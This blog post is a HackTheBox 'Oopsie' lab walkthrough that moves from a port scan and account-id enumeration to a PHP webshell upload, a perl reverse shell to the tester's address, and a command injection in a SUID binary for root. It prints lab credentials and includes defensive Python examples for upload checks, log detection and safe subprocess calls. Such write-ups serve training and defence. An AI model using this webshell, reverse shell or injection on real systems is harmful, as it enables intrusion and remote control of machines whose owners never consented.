HackTheBox Starting Point Oopsie .28

Posted by Mr.Be1ieVe on Friday, December 4, 2020

Scan results

Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-03 06:15 EST
Nmap scan report for 10.10.10.28
Host is up (0.49s latency).

PORT     STATE  SERVICE          VERSION
21/tcp   closed ftp
23/tcp   closed telnet
53/tcp   closed domain
80/tcp   open   http             Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome
110/tcp  closed pop3
111/tcp  closed rpcbind
113/tcp  closed ident
135/tcp  closed msrpc
139/tcp  closed netbios-ssn
143/tcp  closed imap
256/tcp  closed fw1-secureremote
445/tcp  closed microsoft-ds
587/tcp  closed submission
993/tcp  closed imaps
995/tcp  closed pop3s
1723/tcp closed pptp
3306/tcp closed mysql
3389/tcp closed ms-wbt-server
5900/tcp closed vnc
8080/tcp closed http-proxy
8888/tcp closed sun-answerbook

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.00 seconds

Open port 80 in the browser: http://10.10.10.28/#

Nothing much to see there, so start scanning for paths.

The scan turns up a login page: http://10.10.10.28/cdn-cgi/login/i

The password is the one recovered from the earlier Windows machine!!! (ugh)

After logging in, the Account page:

http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id=1

The URL carries id=1. Brute-forcing the id parameter turns up the super admin's id and account at id=30.

On the upload page, the super admin's cookie is needed to reach the upload function.

The dirsearch tool finds /uploads/; uploaded PHP files are saved there.
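The upload page above accepted a .php file and served it back from /uploads/. As an added example (not code from the original post or from the box), here is how an upload handler can refuse that: the content type is decided from the file's magic bytes rather than its client-supplied name, the stored name is chosen by the server, the file is written without the execute bit, and the role check reads server-side session state. The directory layout, the allowed types and the role string "super admin" are assumptions for the illustration.

```python
import os
import secrets
import tempfile

# Accepted content types, identified by leading magic bytes instead of the
# client-supplied file name or Content-Type header (assumed policy: images only).
ALLOWED_SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
MAX_UPLOAD_BYTES = 2 * 1024 * 1024
UPLOAD_ROLE = "super admin"  # role name assumed from the post's description

# Constructed sample inputs: a minimal PNG header and the post's webshell source.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
WEBSHELL_SAMPLE = b"<?php echo shell_exec($_GET['shell']);?>"


def detect_image_type(data: bytes):
    """Return the extension matching the file's magic bytes, or None."""
    for magic, ext in ALLOWED_SIGNATURES.items():
        if data.startswith(magic):
            return ext
    return None


def validate_upload(data: bytes, session_role: str) -> str:
    """Return the extension the file may be stored under, or raise."""
    # session_role must be looked up server-side from the session id, never
    # taken from a role value the client sends in a cookie or form field.
    if session_role != UPLOAD_ROLE:
        raise PermissionError("upload is restricted to the super admin role")
    if len(data) > MAX_UPLOAD_BYTES:
        raise ValueError("file exceeds size limit")
    ext = detect_image_type(data)
    if ext is None:
        raise ValueError("content is not an allowed image type")
    return ext


def store_upload(upload_dir: str, data: bytes, session_role: str) -> str:
    """Validate and write the file under a server-chosen random name."""
    ext = validate_upload(data, session_role)
    # The original filename (and any .php suffix on it) is discarded entirely.
    name = f"{secrets.token_hex(16)}.{ext}"
    path = os.path.join(upload_dir, name)
    with open(path, "wb") as fh:
        fh.write(data)
    os.chmod(path, 0o640)  # readable by the web server, never executable
    return name


def demo() -> bool:
    """Store the sample PNG in a temporary directory; True if the name is server-generated."""
    upload_dir = tempfile.mkdtemp()
    name = store_upload(upload_dir, PNG_SAMPLE, UPLOAD_ROLE)
    return name.endswith(".png") and len(name) == 36


if __name__ == "__main__":
    print("stored ok:", demo())
```

Pairing this with a web-server rule that disables script execution for the upload directory (for Apache with mod_php, `php_admin_flag engine off` inside a `<Directory>` block for /uploads) means that even a file that slips past validation is served as bytes rather than run.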

Here the PHP one-liner reverse shell dropped the connection as soon as it connected; using perl connects normally.

test.php:
<?php echo shell_exec($_GET['shell']);?>

Request the link http://10.10.10.28/uploads/test.php?shell=perl%20-MIO%20-e%20%27$p=fork;exit,if($p);$c=new%20IO::Socket::INET(PeerAddr,%2210.10.14.214:4444%22);STDIN-%3Efdopen($c,r);$~-%3Efdopen($c,w);system$_%20while%3C%3E;%27

The corresponding perl command: perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:4242");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

See swisskyrepo/PayloadsAllTheThings.
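Both steps of the web phase above leave a clear trace in the Apache access log: one client walking the id parameter of admin.php through dozens of values, then a request for a .php file under /uploads/, a directory that should only ever hold static files. As an added example (not from the original post), the script below parses combined-format log lines and flags both patterns. The log lines are constructed to mirror this box's URLs, and the sweep threshold of 10 distinct ids is an assumed tuning value.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Apache combined log format; only the fields the checks need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Script extensions that should never be requested under the static upload directory.
EXEC_EXTENSIONS = (".php", ".phtml", ".php5", ".phar")


def parse_line(line: str):
    """Return the captured fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyze(lines, sweep_threshold: int = 10):
    """Flag clients enumerating account ids and any request for a script under /uploads/."""
    ids_seen = defaultdict(set)
    upload_exec = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # malformed line; a real pipeline would count these
        parts = urlsplit(rec["url"])
        query = parse_qs(parts.query)
        if parts.path == "/cdn-cgi/login/admin.php" and "id" in query:
            ids_seen[rec["ip"]].update(query["id"])
        if parts.path.startswith("/uploads/") and parts.path.lower().endswith(EXEC_EXTENSIONS):
            upload_exec.append((rec["ip"], rec["url"], rec["status"]))
    # Distinct ids per client over the whole input; production detection would
    # window this by time so a slow sweep is still caught and a busy admin is not.
    id_sweeps = {ip: len(ids) for ip, ids in ids_seen.items() if len(ids) >= sweep_threshold}
    return {"id_sweeps": id_sweeps, "upload_exec": upload_exec}


def build_sample_log():
    """Constructed log lines: one ordinary account view, a 30-id sweep, one webshell hit."""
    base = ('{ip} - - [03/Dec/2020:06:{mm:02d}:{ss:02d} -0500] '
            '"GET {url} HTTP/1.1" 200 1832 "-" "Mozilla/5.0"')
    lines = [base.format(ip="10.10.14.5", mm=19, ss=40,
                         url="/cdn-cgi/login/admin.php?content=accounts&id=4")]
    lines += [base.format(ip="10.10.14.214", mm=20, ss=i,
                          url=f"/cdn-cgi/login/admin.php?content=accounts&id={i}")
              for i in range(1, 31)]
    lines.append(base.format(ip="10.10.14.214", mm=21, ss=5, url="/uploads/test.php?shell=id"))
    lines.append("garbage line that does not parse")
    return lines


if __name__ == "__main__":
    report = analyze(build_sample_log())
    for ip, count in report["id_sweeps"].items():
        print(f"id sweep: {ip} requested {count} distinct account ids")
    for ip, url, status in report["upload_exec"]:
        print(f"script under /uploads/: {ip} -> {url} ({status})")
```

The second check is the cheaper and more reliable of the two: a 200 response for any .php path under /uploads/ means the server executed user-supplied content, which should never happen if that directory is configured as static.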

Once connected, the next step is privilege escalation.

SHELL=/bin/bash script -q /dev/null   // see note 1
Ctrl-Z                                // see note 2
stty raw -echo                        // see note 3
fg                                    // see note 4
reset                                 // see note 5
xterm                                 // see note 6
  1. Runs script with the environment variable SHELL set to /bin/bash and the arguments -q and /dev/null. -q means quiet, and the typescript is written to /dev/null (the bit bucket). Without script -q /dev/null no new bash is started; SHELL=/bin/bash alone only sets the shell to bash. With it, a new shell is spawned for you and everything is recorded.
  2. Suspends netcat into the background.
  3. Puts the local terminal into raw mode so it does not interfere with the remote terminal.
  4. Brings netcat back to the foreground. Note: the command you type here is not echoed.
  5. Resets the remote terminal; in testing this step can also be skipped.
  6. Runs xterm. Source: TF0xn's CSDN blog post "Penetration testing practice range hackthebox: Starting Point Oopsie walkthrough" (渗透测试练习靶场hackthebox——Starting Point Oopsie攻略).

After rummaging through the directories, there is a db.php under cdn-cgi/login that contains an account and password; su to that account gives user privileges.

ls -lh $(find / -perm -u=s -type f 2>/dev/null) lists executables with the SUID bit set.

cat /etc/group shows the bugtracker group.

Since it can be run, I executed /usr/bin/bugtracker directly. It looks like it wraps a cat command, so I tried command injection with ; and it worked, giving root.
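The bugtracker binary above fails because it hands a user-controlled string to a shell, so a ; in the input ends the cat command and starts another. As an added example (not the box's binary, which is native code, and not from the original post), the same lookup is written below the way a setuid helper should be written in any language: the id is validated against a strict pattern, the file path is confined to a fixed directory, and the external program is invoked with an argv list and an absolute path, so no shell ever parses the input. The report directory layout (one file per numeric id) is an assumption for the illustration.

```python
import os
import re
import subprocess
import tempfile
from pathlib import Path

# Only a short run of digits is a valid report id; anything else is rejected
# before it goes anywhere near a command line (assumed id format).
REPORT_ID_RE = re.compile(r"[0-9]{1,9}")


def validate_report_id(raw: str) -> str:
    """Return the id unchanged if it is purely numeric, else raise ValueError."""
    if not REPORT_ID_RE.fullmatch(raw):
        raise ValueError(f"invalid report id: {raw!r}")
    return raw


def report_path(report_dir: Path, report_id: str) -> Path:
    """Resolve the report file and confirm it still sits inside report_dir."""
    base = report_dir.resolve()
    path = (base / report_id).resolve()
    if path.parent != base:
        raise ValueError("report path escapes the report directory")
    return path


def read_report(report_dir: str, raw_id: str) -> str:
    """Validate the id, then run cat with an argv list (no shell, absolute path)."""
    report_id = validate_report_id(raw_id)
    path = report_path(Path(report_dir), report_id)
    # argv elements are passed to the program as-is: characters such as ; | or $
    # in the argument are ordinary bytes, never command separators. The absolute
    # path means the program run does not depend on the caller's PATH.
    result = subprocess.run(["/bin/cat", str(path)], capture_output=True, text=True, check=True)
    return result.stdout


def make_sample_report_dir() -> str:
    """Create a temporary directory with one constructed report file named '7'."""
    report_dir = tempfile.mkdtemp()
    with open(os.path.join(report_dir, "7"), "w") as fh:
        fh.write("report seven\n")
    return report_dir


if __name__ == "__main__":
    sample_dir = make_sample_report_dir()
    print(read_report(sample_dir, "7"), end="")
    for bad in ("7; id", "../etc/passwd", ""):
        try:
            read_report(sample_dir, bad)
        except ValueError as exc:
            print("rejected:", exc)
```

Validation alone would have closed the injection; the argv form and the absolute path are there so that the program stays safe even if the validation is later loosened, which is the defence-in-depth a setuid root helper needs.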

ls -lRa /root to see what is under root's home directory.

-R, --recursive    list subdirectories recursively

Inside root’s folder, we see a .config folder, which contains a FileZilla config file with the credentials ftpuser / mc@F1l3ZilL4 visible in plain text.
